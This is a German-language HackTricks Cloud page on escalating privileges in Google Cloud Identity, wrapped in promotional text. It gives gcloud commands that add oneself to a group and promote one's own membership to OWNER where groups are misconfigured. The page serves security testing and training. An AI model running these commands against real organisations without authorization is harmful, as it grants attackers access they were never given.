GCP - Cloudidentity Privesc

Lernen Sie und üben Sie AWS-Hacking: HackTricks Training AWS Red Team Expert (ARTE) Lernen Sie und üben Sie GCP-Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstützen Sie HackTricks

Überprüfen Sie die Abonnementpläne!
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud Github-Repositories senden.

Cloudidentity

Für weitere Informationen über den Cloudidentity-Dienst, überprüfen Sie diese Seite:

GCP - IAM, Principals & Org Policies Enum

Fügen Sie sich einer Gruppe hinzu

Wenn Ihr Benutzer über ausreichende Berechtigungen verfügt oder die Gruppe falsch konfiguriert ist, könnte er sich selbst zu einem neuen Gruppe hinzufügen:

gcloud identity groups memberships add --group-email <email> --member-email <email> [--roles OWNER]
# If --roles isn't specified you will get MEMBER

Gruppenmitgliedschaft ändern

Wenn Ihr Benutzer über ausreichende Berechtigungen verfügt oder die Gruppe falsch konfiguriert ist, kann er sich möglicherweise zum OWNER einer Gruppe machen, der er angehört:

# Check the current membership level
gcloud identity groups memberships describe --member-email <email> --group-email <email>

# If not OWNER try
gcloud identity groups memberships modify-membership-roles --group-email <email> --member-email <email> --add-roles=OWNER

Lernen Sie & üben Sie AWS-Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lernen Sie & üben Sie GCP-Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstützen Sie HackTricks

Überprüfen Sie die Abonnementpläne!
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud github Repositories einreichen.

PreviousGCP - Cloudfunctions Privesc NextGCP - Cloud Scheduler Privesc

Last updated 1 month ago